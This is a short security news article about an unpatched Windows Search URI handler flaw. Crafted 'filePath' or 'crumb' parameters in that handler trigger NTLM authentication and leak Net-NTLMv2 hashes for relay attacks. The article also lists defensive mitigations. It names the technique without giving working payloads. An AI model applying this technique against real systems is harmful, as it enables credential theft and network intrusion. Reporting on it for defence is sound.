Unpatched Windows Search URI Vulnerability Exposes User Credentials to Attackers
An unpatched vulnerability in Windows Search URI handler has been disclosed, potentially exposing user credentials to attackers. This issue, similar to CVE-2026-33829, allows attackers to steal NTLMv2 hashes, which can be used for unauthorized access. The vulnerability resides in the search URI handler, as highlighted by Huntress.
The issue stems from the handler's acceptance and lack of validation of the 'filePath' parameter, which can be manipulated to trigger NTLM authentication and expose the victim's Net-NTLMv2 hash. By using a 'crumb' parameter instead, attackers can craft malicious URLs to steal the hash, as demonstrated by Varonis in February 2024. This vulnerability, CVE-2023-35636, was also documented by Varonis.
The consequences of this vulnerability are severe. Attackers can use the captured hash to conduct relay attacks and gain deeper access into a network. Despite responsible disclosure, Microsoft declined to address the issue, citing severity criteria. As a result, organizations are advised to take proactive measures to mitigate the risk.
To protect against this vulnerability, organizations should consider the following:
- Block outbound SMB (TCP/445 and TCP/139) on hosts that don't require it.
- Enforce SMB signing to prevent captured hashes from being relayed against internal services.
- Disable NTLM where applicable.
This unpatched vulnerability highlights the ongoing challenges in securing Windows systems. It serves as a reminder of the importance of regular patching and the need for organizations to stay vigilant against emerging threats.
